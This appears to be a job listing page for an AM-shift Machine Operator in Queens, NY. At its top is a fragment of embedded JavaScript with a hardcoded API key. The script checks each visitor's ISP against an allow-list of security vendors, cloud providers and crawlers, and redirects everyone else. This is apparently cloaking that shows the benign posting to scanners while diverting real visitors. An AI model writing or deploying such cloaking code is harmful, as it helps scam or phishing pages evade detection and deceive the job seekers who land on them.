Machine Operator (Choose Shift)
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Machine Operator for the AM shift in Queens, NY.
Responsibilities:
- Operate, monitor, and maintain various manufacturing machines safely and efficiently.
- Inspect products for quality and accuracy, ensuring adherence to specifications.
- Perform routine machine adjustments and troubleshooting to minimize downtime.
- Maintain a clean and organized work area, following safety protocols.
- Complete production documentation accurately and timely.
Skills Needed:
- Attention to detail and strong focus on quality.
- Ability to read and interpret technical instructions and schematics.
- Basic mechanical aptitude and problem-solving skills.
- Good communication and teamwork abilities.
- Commitment to safety procedures and standards.
Benefits:
- Competitive salary and overtime opportunities.
- Health, dental, and vision insurance.
- Paid time off and holidays.
- Training and career advancement possibilities.
- Supportive team environment in a modern facility.